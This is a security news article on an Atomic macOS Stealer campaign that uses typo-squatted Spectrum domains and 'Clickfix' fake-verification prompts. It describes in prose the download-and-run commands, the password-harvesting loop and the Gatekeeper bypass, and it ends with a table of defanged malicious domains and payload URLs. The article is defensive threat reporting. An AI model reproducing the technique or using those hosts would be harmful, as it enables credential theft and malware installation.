Researchers have discovered a new Atomic macOS Stealer (AMOS) variant campaign that exploits typo-squatted domains mimicking Spectrum, the prominent U.S. telecom provider.
The attackers orchestrate this campaign using the Clickfix method, a social engineering strategy notorious for manipulating users into running terminal commands under the guise of identity or security verification.
The campaign stands out for deploying differentiated payloads based on the victim’s operating system, making it both versatile and dangerous.
On Windows endpoints, unsuspecting users are encouraged to copy a PowerShell command, which downloads and executes a remote script.
For macOS victims, the attack is especially insidious. Once the user clicks “Alternative Verification,” a Bash command fetches a malicious shell script directly from a fraudulent domain.
The script is designed to extract the user’s system password through a repeated prompt loop, verifying the input against macOS directory services using legitimate dscl checks.
A valid credential is then stored locally before the script silently downloads and runs an AMOS variant binary, employing macOS commands such as xattr and sudo to bypass endpoint protections subverting Gatekeeper and other built-in defenses.
Poor Infrastructure Hints at Rushed Campaign
Analysis of the campaign’s delivery pages revealed a series of programming oversights, such as inconsistent instructions that mismatched the user’s platform.
Some delivery sites, for instance, prompted both Windows and Mac users to “Press & hold the Windows Key + R,” reflecting a lack of tailored logic and suggesting the infrastructure was hastily assembled.
Further scrutiny of the web source code uncovered Russian-language comments, reinforcing the likelihood of involvement by Russian-speaking cybercriminals.
Attribution efforts tied together numerous infrastructure elements, including command-and-control (C2) domains and distribution portals, some of which have been highlighted as indicators of future attacks.
Multifaceted Impact
The campaign’s consequences extend beyond credential theft. Attackers gaining access to macOS user passwords could potentially compromise corporate VPNs, internal communication tools, and high-value enterprise resources.
By executing native macOS utilities, the malware diminishes the effectiveness of traditional endpoint protection platforms, lowering detection rates.
The credentials and access harvested may be sold to access brokers on cybercriminal marketplaces or leveraged for subsequent attacks, such as ransomware deployment or sensitive data exfiltration.
The emergence of AMOS variants, including “Poseidon” and “Odyssey,” underscores a trend of increasingly sophisticated infostealer families targeting macOS.
According to the CloudSek Report, their ability to adapt, evade, and persist on multiple platforms renders them a critical threat vector for both corporate and individual users.
Given the sophistication of the campaign, security experts recommend prioritizing user awareness programs to educate staff about the dangers of following instructions presented as system prompts.
Hardening macOS endpoints through strict execution policies, routine monitoring for abnormal password and sudo activities, and hunting for AMOS indicators of compromise remain essential strategies to disrupt such attack chains.
Indicators of Compromise (IOCs)
| Indicator Type | Value | Use |
|---|---|---|
| Domain | panel-spectrum[.]net | Clickfix Delivery |
| Domain | spectrum-ticket[.]net | Clickfix Delivery |
| Domain | cf-verifi.pages[.]dev | Command and Control |
| Domain | applemacios[.]com | Command and Control |
| MD5 Hash | eaedee8fc9fe336bcde021bf243e332a | AMOS Variant |
| URL | https://cf-verifi.pages[.]dev/i.txt | Contacted URLs |
| URL | https://applemacios[.]com/getrur/install.sh | Contacted URLs |
| URL | https://applemacios[.]com/getrur/update | Contacted URLs |
| Domain | rugmel[.]cat | Clickfix Indicator/future |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20variant%20campaign%20that%20exploits%20typo-squatted%20domains%20mimicking%20Spectrum.){kind=link}